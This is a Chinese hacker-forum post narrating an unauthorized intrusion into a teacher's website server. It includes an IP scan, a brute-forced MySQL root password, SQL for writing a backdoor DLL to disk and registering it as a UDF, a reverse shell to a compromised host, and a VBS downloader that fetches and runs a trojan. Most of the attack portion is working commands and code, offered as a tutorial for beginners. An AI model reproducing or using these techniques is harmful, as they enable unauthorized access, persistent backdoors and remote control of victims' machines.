Guest 58.209.199.x Unregistered
|
黑客任务菜鸟之入侵实战
又是一个阳光灿烂的日子,复习了一天的编译原理,头都大了一倍。。(老师:谁TMD叫你不去上课!~)寒~~~
回到寝室还是第一时间打开偶的宝贝电脑,随手点进几个黑客站点逛逛,发现都还是前几天的文章。
闲着无聊的时候,忽然想起偶的软件工程老师在开学的第一节课说的,他有个人网站,叫偶们有时间去看看
。呵呵,那就去看看吧。进来了,是一个音乐站,第一感觉是站的美工还错的不错,
如图1
嘿嘿,偶不说大家都应该知道偶下一步要做什么了!^_^~
随便点一个连接,发现在状态拦里显示的是一个JAVASCRIPT脚本连接:
javascript[s:60]pen_window(\'ShowMusic.asp?id=3270\',\'ShowMusic\',\'width=366,heigut=80\');于是就把把段地址凑成一个完整的
路径,http://cidea.cn/WToponline/djweb/ShowMusic.asp?id=3270.加’点先,我昏,回车后弹出一对话框
\"你试图SQL注入本站,不过没那么容易!\",
如图2
安全做的还不错哈!~,不过这也 钩起了偶的挑战欲望了哈!
那么这个站从SQL注入来说就基本每戏了,先拿出DOMAIN3.5去跑跑域名吧 ,一共有10来个站,看了下基本上
没什么大的漏洞,其中有俩个纯在SQL注入都是ACCESS数据库,而且暴出来的权限都是前台文章管理员,基本上是没什么用!~
那不就是说常规的入侵手法是行不通了,那先看看服务器主机的情况吧!~
先PING一下,返回IP为:61.129.35.*,直接telnet IP 80 然后get返回
HTTP/1.1 200 OK
Date: Sun, 18 Dec 2005 05:35:48 GMT
Server: Microsoft-IIS/5.0
服务器应该是2000的吧,后来登陆3389也证实了这一点,
既然是从主机入手,还是先扫描一下,拿出superscan3.0扫了一下。发现开了80.21.3306,也就是说服务器用的是MYSQL数据库
现在的mysql若口令还是一抓一大把的,偶就搞了几个极品的MYSQL服务器哈!~那就用HScan,挂上偶制作的超级字典带着
30%去跑一下吧,毕竟偶还是很相信偶的字典的威力的,^_^
好了,一杯茶的功夫,到偶的肉鸡上一看,还真的有收获哈!~帐号:root密码:654321
哈哈,这下看你还不死,马上mysql -h61.129.35.* -p 输入654321回车,连上了,
如图3
mysql〉 use test;create table tmp(str TEXT);
然后凭着自己入侵的一点经验,开始猜测IIS主目录的物理路径,
c:inetpubwwwroot,c:www,c:wwwroot,c:inetpubweb,d:web, d:wwwroot。。
越猜越郁闷啊,算了,不猜了从MYSQL写马的这条路就先放一放吧,
(ps:方法就是找到物理路径后
insert into cmd values(\"一行一行的asp代码,呵呵\");
然后
select * from cmd into outfile \"路径cmd.asp\";
然后把我们刚才建的表都删除掉:
mysql〉 use test; drop table tmp; drop table cmd;)
下面我们看看能不能上传我们的后们DLL,现在目前来说用的比较多的就是MIX的两个dll可以支持正象
和反向连接,偶一般用反向连接功能可以突破防火墙,怎么把他通过mysql传过去呢?其实方法很早就公布了
只不过没有象MSSQL那样的普及,呵呵,简单的原理偶还是说一下吧,老鸟跳过
============================================================================================
set @a = concat(\'\'.....);
GRANT ALL PRIVILEGES ON *.* TO awhy@\'%\'IDENTIFIED BY \'tamade\' WITH GRANT OPTION ;(授权)
use mysql;
FLUSH PRIVILEGES;
create table HCKE(data LONGBLOB);(创建表)
insert into HACK values(\"\");
update HACK set data = @a;(修改插入数据。这个@a我们DLL文件的16进制的代码)
select data from HACK into DUMPFILE \'c rogram FilesHACK.dll\';(16进制还原成dll二进制文本)
drop table HACK;
CREATE FUNCTION backdoor RETURNS STRING SONAME \'c rogram FilesHACK.DLL\';(创建函数backdoor)
如何得到DLL文件的16进制代码呢?可以直接在UE里打开DLL文件,转换成16进制后复制出来就可以了
如图5
把你复制的代码加在 set @a = concat(\'\'代码); 里的代码里,就可以了
把上面的保存在一个TEXT里接着就可以传了
============================================================================================
mysql>. c:mix.txt,呵呵没有出错,看来成功把偶的后门传上去了哈!~胜利在望了。。
如图6
接着来反弹SHELL吧
先监听端口,我用的是16398
mysql>select mix(\'58.49.199.99\',\'16398\');如图6,7
58.49.199.99 是你要返回shell的ip,。 我们这里用的是肉鸡的ip,^_^
好了,得到了shell,
写一个脚本来下载木马先
echo
iRemote = LCase(WScript.Arguments(0)) >>c:down.vbs
Set xPost = CreateObject(\"Microsoft.XMLHTTP\") >>c:down.vbs
xPost.Open \"GET\",iRemote,0 >>c:down.vbs
xPost.Send() >>c:down.vbs
Set sGet = CreateObject(\"ADODB.Stream\") >>c:down.vbs
sGet.Mode = 3 >>c:down.vbs
sGet.Type = 1 >>c:down.vbs
sGet.Open() >>c:down.vbs
sGet.Write(xPost.responseBody) >>c:down.vbs
sGet.SaveToFile iLocal,2 >>c:down.vbs
用TYPE先看一下是不是有错误,确认没问题了,来
c:down.vbs http://偶的web肉鸡/CFFW/xpsp2.exe updata.exe
很快就下好了(感谢Matin提供PCshare),运行。。。
OK,上线了。如图8
呵呵,剩下的事就是清理战场了!~删了c:down.vbs还有那个dll
最后然后帮他把漏洞堵上吧,
入侵到次就算搞一段落了,用angle的那句话:工具只是武器,技术才是灵魂。自己动手,丰衣足事。
偶的原来的QQ不用,换了一个qq:422165416希望高手加偶一起讨论
|
欢迎光临 www.tenyqq.cn |
[此贴子已经被作者于2006-12-28 20:35:35编辑过]
|
|